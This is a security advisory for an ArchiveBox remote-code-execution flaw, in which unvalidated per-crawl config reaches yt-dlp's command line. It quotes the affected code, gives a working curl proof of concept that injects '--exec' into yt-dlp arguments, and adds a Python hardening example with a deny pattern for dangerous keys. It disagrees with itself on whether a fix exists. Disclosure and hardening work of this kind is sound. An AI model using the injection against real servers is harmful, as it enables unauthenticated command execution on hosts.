CVE-2026-42601: ArchiveBox Exposes Local File Access via Unvalidated Config
CVE-2026-42601 · GHSA-3h23-7824-pj8r · CVSS 9.3
Summary
ArchiveBox's /add/ endpoint accepts a per-crawl config JSON field that is merged into the crawl configuration without validation and later exported as environment variables to the archive plugins. An attacker can therefore set keys such as YTDLP_ARGS_EXTRA or GALLERYDL_ARGS_EXTRA (which are appended to the yt-dlp and gallery-dl command lines, where --exec runs a shell command) or override any *_BINARY key, and so execute arbitrary commands on the server, including reading local files. When PUBLIC_ADD_VIEW=True, the setting commonly enabled for bookmarklet usage, the endpoint is reachable without authentication; it is also @csrf_exempt. Until a fixed version is installed, set PUBLIC_ADD_VIEW=False (disabling bookmarklet usage) so that /add/ requires a login, and treat anyone who can submit to /add/ as able to run commands on the host.
What to do
No fix is available yet according to this listing. Check with your software vendor for updates. In the meantime, confirm that PUBLIC_ADD_VIEW is set to False in your ArchiveBox configuration so that /add/ is not reachable pre-auth, and restrict which accounts can submit URLs, since the per-crawl config field is accepted from any caller of that endpoint.
Affected software
| Ecosystem | Vendor | Product | Affected versions | Fixed version | CPE |
|---|---|---|---|---|---|
| pip | – | archivebox | <= 0.8.6rc0 | – | – |
| – | archivebox | archivebox | < 0.8.6 | 0.8.6 | cpe:2.3:a:archivebox:archivebox:*:*:*:*:*:*:*:* |
Original title
ArchiveBox Vulnerable to RCE via unvalidated per-crawl config overrides in AddView
Original description
The /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE.
When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt.
Affected code:
core/views.py:887 - user config extracted with no validation:
```python
custom_config = form.cleaned_data.get("config") or {}
```
core/views.py:918 - merged into crawl config:
```python
config.update(custom_config)
```
config/configset.py:255-256 - crawl config applied with high priority:
```python
if crawl and hasattr(crawl, "config") and crawl.config:
    config.update(crawl.config)
```
hooks.py:398-411 - config exported as env vars:
```python
for key, value in config.items():
    if key in SKIP_KEYS: continue
    env[key] = str(value)
```
plugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:
```python
ytdlp_args_extra = get_env_array("YTDLP_ARGS_EXTRA", [])
cmd.extend(ytdlp_args_extra)
```
PoC (pre-auth when PUBLIC_ADD_VIEW=True):
```bash
curl -X POST http://localhost:8000/add/ \
-d "url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
-d "depth=0" \
-d "config={\"YTDLP_ARGS_EXTRA\": \"[\\\"--exec\\\", \\\"id > /tmp/pwned\\\"]\"}"
```
After the crawl runs, yt-dlp executes id > /tmp/pwned via its --exec flag.
Same approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or overriding any *_BINARY key.
Impact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.
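The following is an added example, not ArchiveBox's own code, that models the chain the advisory describes (request config merged into the crawl config, exported as environment variables, then spliced into the yt-dlp argv) and places the unvalidated merge beside an allow-listed one. The allow-list contents, the argv builder and the get_env_array parser are assumptions made for illustration; only the key names YTDLP_ARGS_EXTRA, YTDLP_BINARY and the --exec flag come from the advisory, and the sample config is constructed from its PoC.

```python
# Added example (not ArchiveBox code): a model of the per-crawl config path
# form config -> crawl config -> env vars -> argv, with the unvalidated merge
# beside an allow-listed one. Function names and the allow-list are assumptions.
import json
import re

# Keys that change which program runs or what arguments it receives. Nothing
# matching this may ever be settable from a crawl request.
DANGEROUS_KEY = re.compile(r"(_ARGS_EXTRA|_BINARY)$")

# Hypothetical allow-list of harmless per-crawl overrides and their types
# (assumption: the real set lives in ArchiveBox's config model, not shown here).
PER_CRAWL_ALLOWED = {"DEPTH": int, "TIMEOUT": int, "SAVE_MEDIA": bool}

# Constructed sample input: the per-crawl config from the advisory's PoC, a
# JSON list encoded inside a string exactly as the curl command submits it.
POC_CONFIG = {"YTDLP_ARGS_EXTRA": '["--exec", "id > /tmp/pwned"]'}


def merge_unvalidated(base: dict, custom: dict) -> dict:
    """Mirrors the vulnerable core/views.py path: config.update(custom_config)."""
    merged = dict(base)
    merged.update(custom)
    return merged


def merge_validated(base: dict, custom: dict, allowed=PER_CRAWL_ALLOWED) -> dict:
    """Hardened merge: only allow-listed keys with the expected scalar type.
    Unknown keys are rejected rather than silently dropped, so a client that
    depends on a denied override fails loudly instead of archiving differently."""
    merged = dict(base)
    for key, value in custom.items():
        if key not in allowed or DANGEROUS_KEY.search(key):
            raise ValueError(f"per-crawl override of {key!r} is not permitted")
        expected = allowed[key]
        # bool is a subclass of int, so True must not pass as an int value
        ok = isinstance(value, expected) and (expected is bool or not isinstance(value, bool))
        if not ok:
            raise ValueError(f"{key} must be {expected.__name__}, got {type(value).__name__}")
        merged[key] = value
    return merged


def is_rejected(custom: dict) -> bool:
    """True if the hardened merge refuses this per-crawl config."""
    try:
        merge_validated({"DEPTH": 0}, custom)
    except ValueError:
        return True
    return False


def export_env(config: dict, skip_keys=frozenset()) -> dict:
    """Mirrors hooks.py: every remaining config value becomes a string env var."""
    return {k: str(v) for k, v in config.items() if k not in skip_keys}


def get_env_array(env: dict, key: str, default: list) -> list:
    """Assumed behaviour of the plugin helper: parse a JSON list from the env
    var, falling back to the default when absent or not a list."""
    raw = env.get(key)
    if raw is None:
        return list(default)
    try:
        parsed = json.loads(raw)
    except json.JSONDecodeError:
        return list(default)
    return [str(item) for item in parsed] if isinstance(parsed, list) else list(default)


def build_ytdlp_cmd(env: dict, url: str) -> list:
    """Mirrors the ytdlp plugin: binary and extra args both come from env."""
    cmd = [env.get("YTDLP_BINARY", "yt-dlp"), "--no-playlist"]
    cmd.extend(get_env_array(env, "YTDLP_ARGS_EXTRA", []))
    cmd.append(url)
    return cmd


def command_runs_shell(cmd: list) -> bool:
    """Audit a built argv for yt-dlp's --exec family, which runs a shell
    command after download. Not exhaustive: a changed binary is just as bad."""
    return any(arg.startswith("--exec") for arg in cmd)


if __name__ == "__main__":
    url = "https://example.invalid/watch?v=demo"  # constructed
    vuln = build_ytdlp_cmd(export_env(merge_unvalidated({"DEPTH": 0}, POC_CONFIG)), url)
    print("unvalidated merge ->", vuln, "shell:", command_runs_shell(vuln))
    print("validated merge rejects PoC:", is_rejected(POC_CONFIG))
```

The point of the allow-list is that the per-crawl config is untrusted input once /add/ is public: every key that reaches env and then argv is a parameter of a subprocess, so the set a request may override has to be enumerated, not the set it may not. The DANGEROUS_KEY check is defence in depth only, in case a later allow-list edit accidentally includes a *_BINARY or *_ARGS_EXTRA key.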
CVSS 4.0 score (GHSA): 9.3
Vulnerability type: CWE-88 (Improper Neutralization of Argument Delimiters in a Command, i.e. argument injection)
Published: 4 May 2026 · Updated: 28 May 2026 · First seen: 4 May 2026